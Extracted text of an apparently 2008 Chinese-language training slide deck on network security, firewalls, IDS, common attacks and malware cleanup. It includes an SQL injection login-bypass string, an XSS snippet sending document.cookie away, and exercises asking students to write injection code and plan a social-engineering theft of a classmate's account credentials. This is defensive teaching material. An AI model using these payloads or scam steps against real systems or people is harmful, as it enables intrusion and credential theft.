网管寒训网路安全与病毒防护.ppt

2008 網管寒訓 網路安全與病毒防護,報告人：朱哥 NCU MENG 2008/1/15,喇賽時間,為什麼要談資訊安全? 近來發生的問題 今日作業,網路安全,網路安全基本介紹,網路安全的基本需求 網路面臨的問題 網路的安全威脅,網路安全的基本需求,傳輸的保密性 (confidentiality) 資料的完整性 (integrity) 身分的鑑別與認證 (authentication) 雙方的不可否認性 (nonrepudiation),網路面臨的問題,病毒蠕蟲攻擊 網路癱瘓 垃圾郵件 機密外洩 非法入侵 即時通訊 (MSN.) back,網路的安全威脅,系統、漏洞不斷被發現，攻擊手法不斷翻新 更新的速度永遠比不過感染的速度 病毒變種快速 攻擊程式及後門程式氾濫 廣告郵件、垃圾訊息及色情網站充斥整個網路 非法下載 即時通訊,隨堂練習,請從網路找出一個近年來的網路攻擊事件 的新聞，並簡單判別它是以上提到的哪種問題?,提高網路連線的安全性,資料加密 (Data Encryption) 明文(plain text) 密文 (cipher text) 認證 (Authorization) 通常是要求使用者輸入帳號密碼 權限設定 (Authentication) 稽核(Auditing) 提供過去事件的相關紀錄利於事後追蹤,典型密碼系統,發送方,接收方,加密演算法,解密演算法,加密金鑰,解密金鑰,明文,密文,明文,網路安全設備,入侵防禦系統 ( IPS & IDS ) 防火牆（Firewall ) 防毒系統 ( Anti-Virus ),Firewall,安裝在兩個網路間的裝置 藉著過濾掉某些不可靠的資料封包來增加系統的安全性 提供稽核與控制存取等服務,Firewall 的基本功能,認證 ( UA, User Authentication ) 預警功能 ( Alert ) 記錄與記錄分析工具 ( Log & Log Analyzer ) 通訊埠的權限設定,Firewall 的缺點,易形成網路上的交通瓶頸 無法防止內部網路的使用者用其合法的身分做破壞系統的行為 不一定能阻止開後門 無法有效阻止有心人士利用原作業系統的漏洞進行入侵破壞行為 不提供資料完整性驗證,三大 Firewall 類型,1. 封包過濾式 2. 應用層閘道式 3. 電路層閘道式,封包過濾式防火牆,應用於網路層 針對每個封包的標頭提供的資訊加以查核 優點： 1. 完全通透性 2. 速度快 缺點： 1. 無法有效防止IP欺騙 2. 有些應用協議不適用 ( EX. HTTP ),隨堂練習,1. 請去網路上找出另外兩種防火牆的簡介， 並列出兩種防火牆的優缺點 2. 請完成以下表格,防火牆,Comodo 個人防火牆 McAfee Personal Firewall,入侵偵測系統 IDS,架設在網路節點與主機間的針孔攝影機 若防火牆是第一道防線 IDS就是第二道防線 可以監控用戶和系統的所有活動 將封包拆開分析再重新組合,隨堂練習,使用IDS是否真的萬無一失? 請查閱網路資料並列出IDS的缺點,防毒軟體,以特徵碼和行為模式辨別病毒、木馬 並不能 100% 阻擋病毒的入侵 ( 因為病毒變種過於快速 ) 不怕一萬，只怕萬一 定期更新病毒碼、主程式,網路的基本運作原理,Internet 世界,TCP/IP 協定,Windows,Port 80,Port 110,Port 25,Port ?,Port 的角色與功能,電腦進出 Internet 的大門 一般來說，每個網路軟體都可以打開任一 個 Port ，但為了傳輸順暢，某些軟體就會 固定使用某幾個 Port 所以沒用到、不常用的幾個 Port 就容易成為駭客入侵最常使用的 Port,隨堂練習,請找出以下幾個程式或協定所使用的 Port 1. FTP 6. HTTP 2. Telnet 7. DHCP 3. SMTP 4. POP3 5. 網路芳鄰,駭客入侵,駭客入侵的對象,Server 個人!,常見的攻擊手法 ( Server ),猜密碼 利用系統的程式漏洞主動攻擊 利用程式功能的被動攻擊 rootkit蠕蟲或木馬 社交工程 DoS ( Denial of Service ) XSS ( Cross-Site Scripting ),猜密碼,取得帳號資訊後猜密碼 常見帳號 admin, administrator, webmaster Brute force ( 暴力法 ) 利用字典檔進行無數次試驗,猜密碼,初級 cracker 會使用的方式之一 WINRAR password recovery 費時 防護： 1. 建立較嚴格的密碼設定規則 2. 密碼輸入次數限制 back,利用系統的程式漏洞主動攻擊,軟體撰寫方式的問題 bug ( 可能會造成系統的不穩定或當機 ) Security ( 程式碼撰寫方式會導致系統的使用權限被惡意者所掌握 ) cracker 會嘗試撰寫一些針對這個漏洞的攻擊程式 攻擊者只要拿到攻擊程式就可以進行攻擊 SQL injection,SQL injection ( 資料隱碼 ),利用使用者輸入的東西來控制你的 SQL Example : select * from member where UID = “& request(“ID“) &“ And Passwd = “& request(“Pwd“) & “ 正常： select * from member where UID=A123456789 And Passwd=1234,SQL injection,使用者帳號 or 1=1 -， 密碼隨便打 結果： select * from member where UID = or 1=1 - And Passwd = asdf1234 邏輯成立 跳過驗證密碼過程 ( p.s. - 符號後的任何敘述都會被當作註解 ),隨堂練習,請運用剛剛所提到的內容 寫出一段資料隱碼攻擊的程式碼,利用系統的程式漏洞主動攻擊,最常見 不需要猜密碼 由攻擊開始到取得你系統的 root 權限不需要兩分鐘，就能夠立刻入侵成功 防護： 1. 關閉不需要的網路服務 & Port 2. 隨時保持更新 back,利用程式功能的被動攻擊,惡意網站提供軟體下載與安裝 瀏覽器主動的答應對方 WWW 主機所提供的各項程式功能， 或者是自動安裝來自對方主機的軟體 瀏覽器漏洞讓對方得以傳送惡意程式碼給你的主機來執行 ActiveX 主動式內容 ( IE core )： EX.讀寫檔案、病毒掃瞄等 但是有讓對方網站控制本機的危險,利用程式功能的被動攻擊,防護： 1. 隨時更新 2. 讓瀏覽器在安裝軟體時，要通過你 的確認後才安裝 3. 不要連上惡意網站 (難 !) back,rootkit蠕蟲或木馬,蠕蟲 ( Worm ) 惡性程式碼感染整個網路 木馬間諜程式 ( Trojan ) 附著在可執行檔案裡開後門爽 ( 側錄、跳板、破壞. ) Rootkit 即為取得root權限的工具包 途徑：漏洞與社交工程等,社交工程 (Social Engineering),簡介 過人與人的互動來達到入侵 的目的 偽裝、謊言 時間可能長以年計 釣魚法 推薦書目：藍色駭客 ( 出版社：皇冠文化 ) MSN photo 系列病毒,社交工程 (Social Engineering),防護： 1. 帳號密碼記在腦子裡不要說 2. 不要隨便相信他人 ( ? ) 3. 追蹤對談者 back,隨堂練習,情境題：如果你是一個駭客，你會怎樣利用社交工程來騙取現在坐在你旁邊同學的郵局帳號密碼 ? ( 請用50100字簡單敘述流程 ),DoS ( Denial of Service ),阻斷式攻擊 SYN：當主機接收了一個帶有 SYN 的 TCP 封包之後，就會啟用對方要求的 port 來等待連線 SYN flood：透過軟體功能，在短短的時間內持續發送出SYN 封包， Server 就會持續不斷的發送確認封包，並且開啟大量的 port 在空等 CPU使用率飆高、頻寬被吃光 掰 機關槍打坦克,補充: 三方交握 ( Three-Way Handshaking ),Client端發出連線要求時，必須要提供下列資訊： Client自己的IP 位址 所使用的Port號 最大容許的 TCP Segment大小 其他訊息 三方交握： 1. Clioent想要與Server連線，因此Host1將SYN旗標設定為1，同時將目前的Segment序號(x)傳送給Host2。 2. Server接收到此要求後，會對此連線要求加以回應，因此將SYN設定為1，此外附上目前序號(y)，及確認序號(x+1)給Client。（在此，確認號碼為發送端序號加一）。 3. Client收到此訊號後，會將序號設定為(x+1)，然後確認序號設定為(y+1)。（確認序號仍為對方的序號加一）。,DDoS (Distributed Denial of Service),進化版 集合眾人之力 先散播惡意軟體 ( 透過後門等方式 ) 同步所有攻擊程式，於同時間朝同目標 攻擊 效率為 DoS 的數倍 單純惡意行為 ( 不是為了取得root ) 目前無較好方法防堵,back,Cross-Site Scripting ( XSS ),跨站腳本攻擊 十大攻擊之首 利用網站上允許使用者輸入字元或字串的欄位插入HTML與Script語言 利用釣魚式攻擊 將使用者的cookie資料導入到駭客網站並儲存 無名小站 ( 2006 ),Cross-Site Scripting ( XSS ),EX. location.replace(/?secret=+document.cookie) 防護 1. Black List 缺點：過濾不乾淨 2. White List 缺點：Client 變化性少,隨堂練習,請從網路上找出一種阻斷式攻擊的方法 ( 講義上沒提到的 ),病毒與木馬防護,木馬 ?,木馬 病毒 傻傻分不清楚,病毒 進入電腦中進行軟硬體的損壞、無 法操作等破壞行為 木馬 進入電腦中蒐集各種資訊，甚至完 全控制寄主,木馬的功用,遠端遙控 轉向入侵 ( or 跳板 ) 截取封包 獲得帳號密碼 DDoS,木馬怎麼防 ?,最佳方式 不要讓它植入你的電腦 不幸中了怎麼辦 ? 1. 想辦法清除 2. 利用之前的備份重灌,簡易中毒自救法,1. 先拔網路線 2. 使用防毒軟體檢察 3. 檢查開機自動執行與系統服務 4. 檢查已執行的程式 5. 查看Port連線情況 6. 上網求救 - 進階： 監控封包,使用防毒軟體檢察,平時就要定期更新病毒碼 防毒軟體只是疫苗，不一定是解藥 p.s. Spybot Search & Destroy,檢查開機自動執行,1. 啟動資料夾,檢查開機自動執行,2. Win.ini 或是 System.ini 在Windows的資料夾裡 Win.ini 通常不會有任何的 run 和 load 參數 System.ini 裡的shell參數的 Explorer.exe不會有 別的程式名稱,檢查開機自動執行,3. 檢察機碼 ( Registry ) 執行regedit HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRunOnce 通常只有系統運行所需之程式或是自己灌的應用程式 Startup /files/StartupCPL.zip,HKEY_USERSS-1-5-21-SoftwareMicrosoftWindow NTCurrentVersionWindows 裡面通常沒有run的機碼 HKEY_LOCAL_MachineSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon 裡面的Shell機碼值應該只有 explorer.exe,檢察系統服務,控制台系統服務 停用可疑或自己不認識的服務,檢查已執行的程式,工作管理員 TaskInfo ( 共享軟體 ) 可以上網查不知道是什麼的程式 /taskmanager/process/index.html /directory/ 一些WinXP的系統程式： smss.exe lsass.exe csrss.exe winlogon.exe Explore.exe regsvc.exe svchost.exe(會有很多個) 進入安全模式將可疑執行檔刪除,查看Port狀況,CurrPort /utils/cports.html 將可疑程式的位置鎖定後刪除,隨堂作業,請去網路上找出以下幾個程式的發行公司 及用途 alg.exe mplaye